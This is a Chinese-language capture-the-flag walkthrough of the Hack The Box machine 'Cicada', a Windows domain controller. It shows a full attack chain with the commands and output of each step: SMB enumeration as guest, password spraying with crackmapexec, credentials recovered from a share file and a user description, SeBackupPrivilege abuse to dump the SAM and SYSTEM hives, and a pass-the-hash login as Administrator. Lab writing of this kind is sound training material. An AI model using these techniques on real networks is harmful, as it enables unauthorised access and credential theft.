AI摘要:对目标IP进行Nmap扫描后,发现`cicada.htb`域名并加入hosts。通过`crackmapexec`工具,利用guest用户成功枚举SMB共享,发现HR共享目录并获取到默认密码。使用该密码成功登录用户michael.wrightson,枚举用户发现david.orelious的密码提示。利用david.orelious的密码访问DEV共享,获取Backup_script.ps1文件,得到emily.oscars的凭据并成功获取shell。利用emily.oscars的SeBackupPrivilege权限,导出SAM和SYSTEM文件,提取Administrator用户的NTLM哈希,最终通过Pass-the-Hash攻击获取Administrator权限,拿到root flag。

本机ip:10.10.16.6
目标ip:10.10.11.35

nmap -sC -sV -Pn 10.10.11.35
得到结果如下

Stats: 0:01:00 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 91.67% done; ETC: 03:54 (0:00:04 remaining)
Nmap scan report for 10.10.11.35
Host is up (0.32s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        (generic dns response: SERVFAIL)
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-26 18:53:59Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.95%I=7%D=7/27%Time=68853250%P=aarch64-unknown-linux-gnu%
SF:r(DNSVersionBindReqTCP,20,"\0\x1e\0\x06\x81\x82\0\x01\0\0\0\0\0\0\x07ve
SF:rsion\x04bind\0\0\x10\0\x03");
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-07-26T18:54:52
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: -59m46s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.85 seconds

通过扫描结果,发现域名cicada.htb,先加入hosts

echo "10.10.11.35 cicada.htb" | sudo tee -a /etc/hosts

让我们首先检查匿名用户是否可以访问SMB共享驱动器。我们将使用crackmapexec个流行的工具来自动枚举域(包括用户、文件/目录和共享)。让我们尝试通过指定协议、域名和--shares参数来枚举SMB共享。

crackmapexec smb cicada.htb --shares

扫描结果:

SMB         cicada.htb      445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         cicada.htb      445    CICADA-DC        [-] Error enumerating shares: STATUS_USER_SESSION_DELETED

如果我们尝试列出账户而不指定用户,就会被拒绝。因此,或许我们可以尝试一些可能正在使用的典型凭据,比如用户名“guest”且无密码。

crackmapexec smb cicada.htb -u 'guest' -p '' --shares

扫描结果:

SMB         cicada.htb      445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         cicada.htb      445    CICADA-DC        [+] cicada.htb\guest: 
SMB         cicada.htb      445    CICADA-DC        [+] Enumerated shares
SMB         cicada.htb      445    CICADA-DC        Share           Permissions     Remark
SMB         cicada.htb      445    CICADA-DC        -----           -----------     ------
SMB         cicada.htb      445    CICADA-DC        ADMIN$                          Remote Admin
SMB         cicada.htb      445    CICADA-DC        C$                              Default share
SMB         cicada.htb      445    CICADA-DC        DEV                             
SMB         cicada.htb      445    CICADA-DC        HR              READ            
SMB         cicada.htb      445    CICADA-DC        IPC$            READ            Remote IPC
SMB         cicada.htb      445    CICADA-DC        NETLOGON                        Logon server share 
SMB         cicada.htb      445    CICADA-DC        SYSVOL                          Logon server share

看起来我们成功了,访客用户可以访问HR共享。因此我们将使用smbclient查看共享并查看其中可能包含的文件。

smbclient //cicada.htb/HR
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 20:29:09 2024
  ..                                  D        0  Thu Mar 14 20:21:29 2024
  Notice from HR.txt                  A     1266  Thu Aug 29 01:31:48 2024

                4168447 blocks of size 4096. 481529 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)

查看内容

cat Notice\ from\ HR.txt
Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

查找SID
现在我们已经找到了这个密码,我们可以尝试检查是否有其他帐户仍在使用此密码。所以,我们必须找出域中的所有用户,我们可以使用Impacket的lookupsid。此工具将尝试暴力破解 AD 域中任何用户的WindowsSecurity 标识符(SID)。每个用户都有一个唯一的 SID,该 SID由其相对标识符(RID)与域SID 连接组成。用户 SID 通常由域控制器颁发,用于授权和访问机制,例如构成登录期间创建的访问令牌的一部分。
为了枚举域,我们将指定来宾用户、域名,并且不使用密码。

impacket-lookupsid 'cicada.htb/guest'@cicada.htb -no-pass
[*] Brute forcing SIDs at cicada.htb
[*] StringBinding ncacn_np:cicada.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
513: CICADA\Domain Users (SidTypeGroup)
514: CICADA\Domain Guests (SidTypeGroup)
515: CICADA\Domain Computers (SidTypeGroup)
516: CICADA\Domain Controllers (SidTypeGroup)
517: CICADA\Cert Publishers (SidTypeAlias)
518: CICADA\Schema Admins (SidTypeGroup)
519: CICADA\Enterprise Admins (SidTypeGroup)
520: CICADA\Group Policy Creator Owners (SidTypeGroup)
521: CICADA\Read-only Domain Controllers (SidTypeGroup)
522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
525: CICADA\Protected Users (SidTypeGroup)
526: CICADA\Key Admins (SidTypeGroup)
527: CICADA\Enterprise Key Admins (SidTypeGroup)
553: CICADA\RAS and IAS Servers (SidTypeAlias)
571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)

在扫描结果中,我们发现了域内的组、用户以及别名信息,这为我们了解整个域的结构提供了帮助。接下来,我们的目标是提取用户列表。因此,我们会聚焦于所有属于 SidTypeUser 类型的条目。为了避免手动筛选的繁琐操作,我们决定重新执行命令,并附加一些参数:使用 grep 来筛选出仅包含用户信息的行,再通过 sed 去除多余内容,仅保留用户名。最后,我们将提取出的用户名写入一个名为 users.txt 的文件中,方便后续使用。

impacket-lookupsid 'cicada.htb/guest'@cicada.htb -no-pass | grep 'SidTypeUser' | sed 's/.*\\\(.*\) (SidTypeUser)/\1/' > users.txt

user.txt记录如下

Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

弱口令
我们将使用 crackmapexec 工具。我们会指定包含之前收集到的用户名的文件,并使用默认密码 Cicada$M6Corpb*@Lp#nZp!8crackmapexec 会对每个用户尝试该密码。

crackmapexec smb cicada.htb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB         cicada.htb      445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         cicada.htb      445    CICADA-DC        [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         cicada.htb      445    CICADA-DC        [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         cicada.htb      445    CICADA-DC        [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         cicada.htb      445    CICADA-DC        [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         cicada.htb      445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         cicada.htb      445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         cicada.htb      445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

看起来用户 michael.wrightson 使用了默认密码!通过获取到正确的凭据,我们可以继续深入继续枚举。

枚举域用户
Michael Wrightson 并没有权限访问其他账户,但我们仍然可以借助他的权限列出机器上的其他用户,看看是否能进一步挖掘到更多有价值的信息。

crackmapexec smb cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB         cicada.htb      445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         cicada.htb      445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
SMB         cicada.htb      445    CICADA-DC        [+] Enumerated domain user(s)
SMB         cicada.htb      445    CICADA-DC        cicada.htb\emily.oscars                   badpwdcount: 0 desc: 
SMB         cicada.htb      445    CICADA-DC        cicada.htb\david.orelious                 badpwdcount: 0 desc: Just in case I forget my password is aRt$Lp#7t*VQ!3                                                                                                              
SMB         cicada.htb      445    CICADA-DC        cicada.htb\michael.wrightson              badpwdcount: 0 desc: 
SMB         cicada.htb      445    CICADA-DC        cicada.htb\sarah.dantelia                 badpwdcount: 1 desc: 
SMB         cicada.htb      445    CICADA-DC        cicada.htb\john.smoulder                  badpwdcount: 1 desc: 
SMB         cicada.htb      445    CICADA-DC        cicada.htb\krbtgt                         badpwdcount: 1 desc: Key Distribution Center Service Account                                                                                                                          
SMB         cicada.htb      445    CICADA-DC        cicada.htb\Guest                          badpwdcount: 1 desc: Built-in account for guest access to the computer/domain                                                                                                         
SMB         cicada.htb      445    CICADA-DC        cicada.htb\Administrator                  badpwdcount: 1 desc: Built-in account for administering the computer/domain

我们可以看见david.orelious 将自己的密码 aRt$Lp#7t*VQ!3
这有助于我们进行提权
先看看这个用户有什么共享资源

crackmapexec smb cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
SMB         cicada.htb      445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         cicada.htb      445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
SMB         cicada.htb      445    CICADA-DC        [+] Enumerated shares
SMB         cicada.htb      445    CICADA-DC        Share           Permissions     Remark
SMB         cicada.htb      445    CICADA-DC        -----           -----------     ------
SMB         cicada.htb      445    CICADA-DC        ADMIN$                          Remote Admin
SMB         cicada.htb      445    CICADA-DC        C$                              Default share
SMB         cicada.htb      445    CICADA-DC        DEV             READ            
SMB         cicada.htb      445    CICADA-DC        HR              READ            
SMB         cicada.htb      445    CICADA-DC        IPC$            READ            Remote IPC
SMB         cicada.htb      445    CICADA-DC        NETLOGON        READ            Logon server share 
SMB         cicada.htb      445    CICADA-DC        SYSVOL          READ            Logon server share

看起来我们有权访问DEV共享文件夹,让我们看看里面是否有任何有用的信息。
使用smbclient

smbclient //cicada.htb/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3'
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 20:31:39 2024
  ..                                  D        0  Thu Mar 14 20:21:29 2024
  Backup_script.ps1                   A      601  Thu Aug 29 01:28:22 2024

                4168447 blocks of size 4096. 455745 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)

可以看到有个powershell文件,我们把它下载下来

┌──(root㉿kali)-[~]
└─# cat Backup_script.ps1

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

我们可以看到另一组凭据:
账号:emily.oscars
密码:Q!3@Lp#M6b7tVt !
我们想要使用这个凭据尝试获得shell,使用Evil-WinRM

evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i cicada.htb
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>

成功获得了shell
按照惯例,我们应该能在它的桌面看到用户标识文件

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> dir


    Directory: C:\Users\emily.oscars.CICADA\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         7/26/2025  11:45 AM             34 user.txt


*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt
7d42adee91a231cf82fd1b0db6f12dc9

拿到用户flag:7d42adee91a231cf82fd1b0db6f12dc9
接下来我们就是尝试提权到root用户获得根目录标识
先查看当前权限

whoami /priv
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

我们发现她居然拥有 SeBackupPrivilege 权限,这通常是赋予服务账户或管理员用户的权限。这个权限的设计初衷是为了便于系统备份,因此它可以绕过现有权限机制访问受系统保护的文件。

简单来说,我们可以利用这些注册表文件来提取用户的 NTLM 哈希,然后使用管理员账户的哈希值进行认证,从而绕过明文密码的限制。

具体来说:

  • SAM(Security Account Manager)注册表配置文件包含本地用户账户和组的成员关系信息,其中也包括用户密码的哈希值;
  • SYSTEM 配置文件中保存了系统范围的配置,例如用于解密 SAM 中密码哈希的系统启动密钥

接下来我们将使用 reg save 命令从注册表中导出这两个配置文件,指定对应的注册表路径,并将其保存为当前目录下的文件,供后续分析使用。

reg save hklm\sam sam
reg save hklm\system system

接着下载这两个文件

download sam
download system

现在我们已经将这些文件保存到本地机器上,可以使用 Impacket 工具包中的 secretsdump 模块来提取用户的 NTLM 哈希
NTLM 哈希是用户明文密码的加密表示形式。一旦获取这些哈希,我们可以尝试进行破解,或者直接利用它们执行 Pass-the-Hash 攻击,从而在无需明文密码的情况下直接认证登录系统。

为了提取哈希,我们需要指定以下参数:

  • -sam:指向 SAM 文件 的路径,其中包含加密的密码数据;
  • -system:指向 SYSTEM 文件 的路径,其中包含用于解密 SAM 文件所需的启动密钥(boot key);

  • local:表明我们操作的是本地文件,而非远程访问。

    impacket-secretsdump -sam sam -system system local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...

在输出结果中,我们找到了 Administrator 用户的 NTLM 哈希值2b87e7c93a3e8a0ea4a581937016f341
我们可以使用该哈希通过 Evil-WinRM 工具直接登录该账户,方法是将该哈希作为 -H 参数传入进行 Pass-the-Hash 攻击。

evil-winrm -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -i cicada.htb

成功登陆,接下来的事情就很简单了,从桌面拿到root.txt,也就是根用户标识

*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         7/26/2025  11:45 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
3dd50f0b8cfe331441ee707b710c76e7

根用户flag:3dd50f0b8cfe331441ee707b710c76e7

最后修改:2025 年 07 月 27 日
© 允许规范转载
如果觉得我的文章对你有用,请随意赞赏